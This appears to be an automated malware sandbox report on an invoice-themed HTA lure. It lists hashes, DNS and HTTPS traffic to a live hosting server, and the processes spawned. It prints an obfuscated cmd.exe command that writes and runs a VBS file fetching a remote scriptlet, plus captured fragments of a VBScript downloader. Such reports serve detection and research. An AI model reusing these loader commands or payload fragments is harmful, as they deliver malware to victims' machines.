WwlnNyCZZ772S_1 = 92..GSZ0DgN8qe2_2 = dejKxG77YT_17("IFY" ,
      Process:C:\Windows\SysWOW64\wscript.exe
      File Type:HTML document, ASCII text
      Category:dropped
      Size (bytes):357
      Entropy (8bit):5.209832565354849
      Encrypted:false
      SSDEEP:6:pn0+Dy9xwol6hEr6VX16hu9nPtrLFwWtHGQcXnMKR+knLFwWtHGQcXNKzm8oD:J0+ox0RJWWPD9Qp0qp92Qm8+
      MD5:8D156A3026840157CA292D51F52152BC
      SHA1:6314B3E015735F52A605CA45608CD14F95FEF6A0
      SHA-256:CA74AE119560729490CBA0ECEE5FD787F05ACACFDC56E675C262A77DD827263C
      SHA-512:A4B7308A1DED43C6BBDB54DA93A850CF0590E9170827ED7AD968490AE9FC46114BB5CFEB081AFB901BBD1AF6257D7DE4A98638995DC6E0D67E781D37BC7C1EB0
      Malicious:false
      Reputation:low
      Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="https://102.57.205.92.host.secureserver.net/g1/">here</a>.</p>.<hr>.<address>Apache/2.4.41 (Ubuntu) Server at 102.57.205.92.host.secureserver.net Port 443</address>.</body></html>.
      File type:HTML document, ASCII text, with very long lines (5906), with CRLF, LF line terminators
      Entropy (8bit):5.90286896304314
      TrID:
      • HyperText Markup Language with DOCTYPE (12503/2) 17.73%
      • HyperText Markup Language (12001/1) 17.02%
      • HyperText Markup Language (12001/1) 17.02%
      • HyperText Markup Language (11501/1) 16.31%
      • HyperText Markup Language (11501/1) 16.31%
      File name:Factura - XwgyvMuOAO.hta
      File size:30'366 bytes
      MD5:65e0b29205432c93c11211a9aa474ff6
      SHA1:1bcb0125fb5fb63460536b33e7b708479d5fb334
      SHA256:b7f0fa3e60b9984e1f79cb3554efc7c5c8437d79d4a74ff02ab3d1e34539f87d
      SHA512:ef7c253039028df1739d3faad2b5805d347dd112bcf3f7fe4e935126919d8092afc893bd05aa41199499c7fef3ee6d57a8c1239ecc4839d526def303ebf77cbe
      SSDEEP:768:Cj7cLaUtu/NZNSjQLxfvyHp28703twuSn:CjFYKdfvy303t/Sn
      TLSH:D3D27CB1CDC11C7B834E5E73AB7DDBF950B38650CA41678A92B8FA8A15877A7400FC58
      File Content Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">..<html lang="en">....<head>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8">.. <title> JQbDI7Fimuq7gCS</title>.. <hta:application application
      TimestampSource PortDest PortSource IPDest IP
      Aug 15, 2024 00:57:59.609626055 CEST49706443192.168.2.592.205.57.102
      Aug 15, 2024 00:57:59.609673023 CEST4434970692.205.57.102192.168.2.5
      Aug 15, 2024 00:57:59.609746933 CEST49706443192.168.2.592.205.57.102
      Aug 15, 2024 00:57:59.620040894 CEST49706443192.168.2.592.205.57.102
      Aug 15, 2024 00:57:59.620062113 CEST4434970692.205.57.102192.168.2.5
      Aug 15, 2024 00:58:00.256825924 CEST4434970692.205.57.102192.168.2.5
      Aug 15, 2024 00:58:00.256896019 CEST49706443192.168.2.592.205.57.102
      Aug 15, 2024 00:58:00.342125893 CEST49706443192.168.2.592.205.57.102
      Aug 15, 2024 00:58:00.342150927 CEST4434970692.205.57.102192.168.2.5
      Aug 15, 2024 00:58:00.342576027 CEST4434970692.205.57.102192.168.2.5
      Aug 15, 2024 00:58:00.342638969 CEST49706443192.168.2.592.205.57.102
      Aug 15, 2024 00:58:00.345966101 CEST49706443192.168.2.592.205.57.102
      Aug 15, 2024 00:58:00.392529964 CEST4434970692.205.57.102192.168.2.5
      Aug 15, 2024 00:58:00.587539911 CEST4434970692.205.57.102192.168.2.5
      Aug 15, 2024 00:58:00.587600946 CEST49706443192.168.2.592.205.57.102
      Aug 15, 2024 00:58:00.587618113 CEST4434970692.205.57.102192.168.2.5
      Aug 15, 2024 00:58:00.587656975 CEST49706443192.168.2.592.205.57.102
      Aug 15, 2024 00:58:00.597131968 CEST49706443192.168.2.592.205.57.102
      Aug 15, 2024 00:58:00.597152948 CEST4434970692.205.57.102192.168.2.5
      Aug 15, 2024 00:58:00.622824907 CEST49707443192.168.2.592.205.57.102
      Aug 15, 2024 00:58:00.622864962 CEST4434970792.205.57.102192.168.2.5
      Aug 15, 2024 00:58:00.623111963 CEST49707443192.168.2.592.205.57.102
      Aug 15, 2024 00:58:00.623610020 CEST49707443192.168.2.592.205.57.102
      Aug 15, 2024 00:58:00.623625994 CEST4434970792.205.57.102192.168.2.5
      Aug 15, 2024 00:58:01.276525021 CEST4434970792.205.57.102192.168.2.5
      Aug 15, 2024 00:58:01.278386116 CEST49707443192.168.2.592.205.57.102
      Aug 15, 2024 00:58:01.309568882 CEST49707443192.168.2.592.205.57.102
      Aug 15, 2024 00:58:01.309580088 CEST4434970792.205.57.102192.168.2.5
      Aug 15, 2024 00:58:01.309815884 CEST49707443192.168.2.592.205.57.102
      Aug 15, 2024 00:58:01.309822083 CEST4434970792.205.57.102192.168.2.5
      Aug 15, 2024 00:58:01.573636055 CEST4434970792.205.57.102192.168.2.5
      Aug 15, 2024 00:58:01.573760986 CEST49707443192.168.2.592.205.57.102
      Aug 15, 2024 00:58:01.573774099 CEST4434970792.205.57.102192.168.2.5
      Aug 15, 2024 00:58:01.573854923 CEST49707443192.168.2.592.205.57.102
      Aug 15, 2024 00:58:01.674240112 CEST4434970792.205.57.102192.168.2.5
      Aug 15, 2024 00:58:01.674249887 CEST4434970792.205.57.102192.168.2.5
      Aug 15, 2024 00:58:01.674276114 CEST4434970792.205.57.102192.168.2.5
      Aug 15, 2024 00:58:01.674415112 CEST49707443192.168.2.592.205.57.102
      Aug 15, 2024 00:58:01.674415112 CEST49707443192.168.2.592.205.57.102
      Aug 15, 2024 00:58:01.674433947 CEST4434970792.205.57.102192.168.2.5
      Aug 15, 2024 00:58:01.674593925 CEST49707443192.168.2.592.205.57.102
      Aug 15, 2024 00:58:01.675844908 CEST4434970792.205.57.102192.168.2.5
      Aug 15, 2024 00:58:01.675982952 CEST4434970792.205.57.102192.168.2.5
      Aug 15, 2024 00:58:01.676055908 CEST49707443192.168.2.592.205.57.102
      Aug 15, 2024 00:58:01.676055908 CEST49707443192.168.2.592.205.57.102
      Aug 15, 2024 00:58:01.683948994 CEST49707443192.168.2.592.205.57.102
      Aug 15, 2024 00:58:01.683971882 CEST4434970792.205.57.102192.168.2.5
      TimestampSource PortDest PortSource IPDest IP
      Aug 15, 2024 00:57:59.591670036 CEST5624253192.168.2.51.1.1.1
      Aug 15, 2024 00:57:59.603858948 CEST53562421.1.1.1192.168.2.5
      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
      Aug 15, 2024 00:57:59.591670036 CEST192.168.2.51.1.1.10x7456Standard query (0)102.57.205.92.host.secureserver.netA (IP address)IN (0x0001)false
      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      Aug 15, 2024 00:57:59.603858948 CEST1.1.1.1192.168.2.50x7456No error (0)102.57.205.92.host.secureserver.net92.205.57.102A (IP address)IN (0x0001)false
      • 102.57.205.92.host.secureserver.net
      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      0192.168.2.54970692.205.57.1024432220C:\Windows\SysWOW64\wscript.exe
      TimestampBytes transferredDirectionData
      2024-08-14 22:58:00 UTC298OUTGET //g1 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: 102.57.205.92.host.secureserver.net
      Connection: Keep-Alive
      2024-08-14 22:58:00 UTC247INHTTP/1.1 301 Moved Permanently
      Date: Wed, 14 Aug 2024 22:58:00 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Location: https://102.57.205.92.host.secureserver.net/g1/
      Content-Length: 357
      Connection: close
      Content-Type: text/html; charset=iso-8859-1
      2024-08-14 22:58:00 UTC357INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 31 30 32 2e 35 37 2e 32 30 35 2e 39 32 2e 68 6f 73 74 2e 73 65 63 75 72 65 73 65 72 76 65 72 2e 6e 65 74 2f 67 31 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://102.57.205.92.host.secureserver.net/g1/">here</a>.</p><hr><address>A


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      1192.168.2.54970792.205.57.1024432220C:\Windows\SysWOW64\wscript.exe
      TimestampBytes transferredDirectionData
      2024-08-14 22:58:01 UTC298OUTGET /g1/ HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: 102.57.205.92.host.secureserver.net
      Connection: Keep-Alive
      2024-08-14 22:58:01 UTC199INHTTP/1.1 200 OK
      Date: Wed, 14 Aug 2024 22:58:01 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Vary: Accept-Encoding
      Connection: close
      Transfer-Encoding: chunked
      Content-Type: text/plain;;charset=UTF-8
      2024-08-14 22:58:01 UTC6INData Raw: 36 34 61 30 0d 0a
      Data Ascii: 64a0
      2024-08-14 22:58:01 UTC16384INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 0d 0a 3c 63 6f 6d 70 6f 6e 65 6e 74 20 69 64 3d 22 63 6f 6d 70 6f 6e 65 6e 74 32 22 3e 0d 0a 0d 0a 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 56 42 53 63 72 69 70 74 22 3e 0d 0a 3c 21 5b 43 44 41 54 41 5b 0d 0a 0d 0a 0d 0a 66 75 6e 63 74 69 6f 6e 20 64 65 6a 4b 78 47 37 37 59 54 5f 31 37 28 6b 67 6e 74 62 49 62 52 76 44 6a 5f 32 36 2c 20 57 77 6c 6e 4e 79 43 5a 5a 37 37 32 53 5f 31 29 0d 0a 44 69 6d 20 4a 6b 63 70 53 35 58 4a 47 71 68 58 4c 51 4f 63 71 42 76 6b 30 5f 32 37 2c 20 56 64 6f 57 7a 78 39 43 48 74 33 34 39 30 4c 7a 43 6c 5f 32 38 0d 0a 4a 6b 63 70 53 35 58 4a 47 71 68 58 4c 51 4f 63 71 42 76 6b 30 5f 32 37 20 3d
      Data Ascii: <?xml version="1.0" encoding="utf-8" ?><component id="component2"><script language="VBScript"><![CDATA[function dejKxG77YT_17(kgntbIbRvDj_26, WwlnNyCZZ772S_1)Dim JkcpS5XJGqhXLQOcqBvk0_27, VdoWzx9CHt3490LzCl_28JkcpS5XJGqhXLQOcqBvk0_27 =
      2024-08-14 22:58:01 UTC9376INData Raw: 31 41 73 49 78 71 54 64 58 62 4d 51 78 61 5f 31 31 29 0d 0a 78 51 67 67 6f 50 4e 49 55 38 65 6c 39 43 79 66 71 4c 4e 5a 5f 35 32 2e 4f 70 65 6e 20 69 6e 59 41 65 76 38 30 59 50 5a 33 51 55 5f 37 2c 20 42 48 56 4f 65 52 37 32 53 37 4e 56 44 73 58 31 5f 35 30 2c 20 46 61 6c 73 65 0d 0a 78 51 67 67 6f 50 4e 49 55 38 65 6c 39 43 79 66 71 4c 4e 5a 5f 35 32 2e 53 65 6e 64 0d 0a 0d 0a 67 52 54 42 70 63 4b 43 6d 6a 4d 5f 35 33 2e 74 79 70 65 20 3d 20 31 0d 0a 67 52 54 42 70 63 4b 43 6d 6a 4d 5f 35 33 2e 6f 70 65 6e 0d 0a 67 52 54 42 70 63 4b 43 6d 6a 4d 5f 35 33 2e 77 72 69 74 65 20 78 51 67 67 6f 50 4e 49 55 38 65 6c 39 43 79 66 71 4c 4e 5a 5f 35 32 2e 72 65 73 70 6f 6e 73 65 42 6f 64 79 0d 0a 67 52 54 42 70 63 4b 43 6d 6a 4d 5f 35 33 2e 73 61 76 65 74 6f 66 69
      Data Ascii: 1AsIxqTdXbMQxa_11)xQggoPNIU8el9CyfqLNZ_52.Open inYAev80YPZ3QU_7, BHVOeR72S7NVDsX1_50, FalsexQggoPNIU8el9CyfqLNZ_52.SendgRTBpcKCmjM_53.type = 1gRTBpcKCmjM_53.opengRTBpcKCmjM_53.write xQggoPNIU8el9CyfqLNZ_52.responseBodygRTBpcKCmjM_53.savetofi
      2024-08-14 22:58:01 UTC2INData Raw: 0d 0a
      Data Ascii:
      2024-08-14 22:58:01 UTC5INData Raw: 30 0d 0a 0d 0a
      Data Ascii: 0


      Click to jump to process

      Click to jump to process

      Click to dive into process behavior distribution

      Click to jump to process

      Target ID:0
      Start time:18:57:57
      Start date:14/08/2024
      Path:C:\Windows\SysWOW64\mshta.exe
      Wow64 process (32bit):true
      Commandline:mshta.exe "C:\Users\user\Desktop\Factura - XwgyvMuOAO.hta"
      Imagebase:0x8b0000
      File size:13'312 bytes
      MD5 hash:06B02D5C097C7DB1F109749C45F3F505
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate
      Has exited:true

      Target ID:2
      Start time:18:57:58
      Start date:14/08/2024
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:"C:\Windows\System32\cmd.exe" /k echo|set /p=^"OwCBGE=".":MwPd="i":Aym5="g":Bzb2EN=":":GetO^">C:\\Users\\Public\\uoxx0.vbs&echo|set /p=^"bject("sCr"+MwPd+"pt"+Bzb2EN+"hT"+"Tps"+Bzb2EN+"//102"+OwCBGE+"57"+OwCBGE+"205"+OwCBGE+"92"+OwCBGE+"host"+OwCBGE+"secureserver"+OwCBGE+"net//"+Aym5+"1")^">>C:\\Users\\Public\\uoxx0.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\uoxx0.vbs
      Imagebase:0x790000
      File size:236'544 bytes
      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:false

      Target ID:3
      Start time:18:57:58
      Start date:14/08/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff6d64d0000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:false

      Target ID:4
      Start time:18:57:58
      Start date:14/08/2024
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo"
      Imagebase:0x790000
      File size:236'544 bytes
      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:5
      Start time:18:57:58
      Start date:14/08/2024
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /S /D /c" set /p="OwCBGE=".":MwPd="i":Aym5="g":Bzb2EN=":":GetO" 1>C:\\Users\\Public\\uoxx0.vbs"
      Imagebase:0x790000
      File size:236'544 bytes
      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:6
      Start time:18:57:58
      Start date:14/08/2024
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo"
      Imagebase:0x790000
      File size:236'544 bytes
      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:7
      Start time:18:57:58
      Start date:14/08/2024
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("sCr"+MwPd+"pt"+Bzb2EN+"hT"+"Tps"+Bzb2EN+"//102"+OwCBGE+"57"+OwCBGE+"205"+OwCBGE+"92"+OwCBGE+"host"+OwCBGE+"secureserver"+OwCBGE+"net//"+Aym5+"1")" 1>>C:\\Users\\Public\\uoxx0.vbs"
      Imagebase:0x790000
      File size:236'544 bytes
      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:8
      Start time:18:57:58
      Start date:14/08/2024
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\uoxx0.vbs
      Imagebase:0x790000
      File size:236'544 bytes
      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:9
      Start time:18:57:58
      Start date:14/08/2024
      Path:C:\Windows\SysWOW64\wscript.exe
      Wow64 process (32bit):true
      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\Public\uoxx0.vbs"
      Imagebase:0x580000
      File size:147'456 bytes
      MD5 hash:FF00E0480075B095948000BDC66E81F0
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate
      Has exited:true

      Reset < >
        Memory Dump Source
        • Source File: 00000000.00000003.2062420143.0000000008EC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 08EC0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_3_8ec0000_mshta.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
        • Instruction ID: e0cd08272b204e5ae2f38cc70ad5864bc79a33c0668369e97803ea9bc6bb8cae
        • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
        • Instruction Fuzzy Hash:
        Memory Dump Source
        • Source File: 00000000.00000003.2062420143.0000000008EC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 08EC0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_3_8ec0000_mshta.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
        • Instruction ID: e0cd08272b204e5ae2f38cc70ad5864bc79a33c0668369e97803ea9bc6bb8cae
        • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
        • Instruction Fuzzy Hash:
        Memory Dump Source
        • Source File: 00000000.00000003.2062420143.0000000008EC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 08EC0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_3_8ec0000_mshta.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
        • Instruction ID: e0cd08272b204e5ae2f38cc70ad5864bc79a33c0668369e97803ea9bc6bb8cae
        • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
        • Instruction Fuzzy Hash: